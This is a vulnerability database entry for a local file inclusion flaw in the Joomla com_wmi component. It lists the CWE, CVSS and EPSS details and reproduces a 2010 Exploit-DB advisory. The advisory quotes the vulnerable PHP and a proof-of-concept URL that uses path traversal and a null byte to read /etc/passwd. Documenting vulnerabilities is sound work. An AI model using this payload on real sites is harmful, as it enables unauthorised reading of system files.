Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-22 |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.8 |
|
AV:N/AC:M/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 12316
Publication date : 2010-04-20 22h00 +00:00
Author : wishnusakti + inc0mp13te
EDB Verified : Yes
================================================================================================
Title : Joomla Component wmi (com_wmi) LFI Vulnerability
Vendor : http://www.paysyspro.com/
Download : http://www.paysyspro.com/jotloader/files.download/3
Date : Sunday, 21 April 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te (HH)
Contact : evileyes60117[at]yahoo.com
================================================================================================
[+] Vulnerable
./components/com_wmi/wmi.php
// Require specific controller if requested
if($controller = JRequest::getVar( 'controller' )) {
require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
}
[+] Exploit
http://[site]/[path]/index.php?option=com_wmi&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
================================================================================================
Very Special thanks :
Penghuni #nob0dy priv8 Server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, cheche angela zhang, madonk, & Bot² Scan :D)
en Semua Komunitas Hacking Tanah Air
Peace Yo :)
to all my friends : mywisdom, cakill, aurell, hafiz, xco, kiddies, xshadow, gblack, petimati,
cakill, krembis, biakkobar, hendri_note
================================================================================================
# ./wishnusakti
Products Mentioned
Configuraton 0
Paysyspro>>Com_wmi >> Version 1.5.0
Joomla>>Joomla\! >> Version *
References